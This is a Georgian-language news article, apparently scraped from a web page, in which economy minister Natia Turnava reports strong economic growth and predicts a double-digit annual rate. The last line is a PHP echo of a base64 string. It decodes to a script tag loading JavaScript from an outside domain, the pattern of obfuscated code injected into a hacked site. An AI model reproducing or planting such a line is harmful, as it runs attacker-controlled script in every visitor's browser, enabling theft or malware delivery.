celsiusi
ავერსი საქკაბელი
შვიდი თვის ზრდა 12.2%-ია, 7%-ით მეტია, ვიდრე 2019 წლის იგივე პერიოდში - ანუ, ზრდა საკმაოდ მაღალია როგორც წინა წელთან, ასევე 2019 წლის ანალოგიურ მაჩვენებელთან შედარებით. ეს გვაძლევს საშუალებას, ვთქვათ, რომ შარშანდელი ჩავარდნა არა მხოლოდ სრულად განულებული იქნება, არამედ პოზიტიურ ტრაექტორიას ვუბრუნდებით,- ამის შესახებ ეკონომიკისა და მდგრადი განვითარების მინისტრმა ნათია თურნავამ ჟურნალისტებს ეკონომიკური ზრდის პროგნოზებზე საუბრისას განუცხადა.
 
ამასთან, როგორც თურნავამ ჟურნალისტებთან აღნიშნა, ყველა წინაპირობა არსებობს, რომ წელიწადი ორნიშნა ეკონომიკური ზრდით დასრულდეს.
 
„აპრილიდან მოყოლებული ვხედავთ, ჩვენი ეკონომიკა რამდენად სწრაფი ტემპით ვითარდება და მისი აღდგენა მიმდინარეობს. ორნიშნა ზრდაა. ეს ტენდენცია გრძელდება. აგვისტოში 10.3%-იანი ზრდა გვქონდა. მთლიანად 8 თვე რომ შევაჯამოთ, 2020 წელთან შედარებით 12%-იანი ზრდაა. ჩვენ ყველა წინაპირობა გვაქვს, რომ წელიწადი ორნიშნა ზრდით დავასრულოთ - ეს არის სამუშაო ადგილები, იმ სიღარიბის დაძლევა, რაც პანდემიამ მოიტანა და ჩვენი ეროვნული ვალუტის სიმყარე, მეტი შემოსავლები საქართველოს მოსახლეობას. ძირითადი კონტრიბუტორი დარგები ტრადიციულად არის ჩვენი მომპოვებელი დარგები, სოფლის მეურნეობა და სოფლის მეურნეობის გადამამუშავებელი დარგები და მომსახურების სფერო - სტუმართ-მასპინძლობის ინდუსტრია, მშენებლობა და ვაჭრობა - ეს არის ძირითადი გამწევი ძალა“, - განაცხადა ნათია თურნავამ.
1182
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");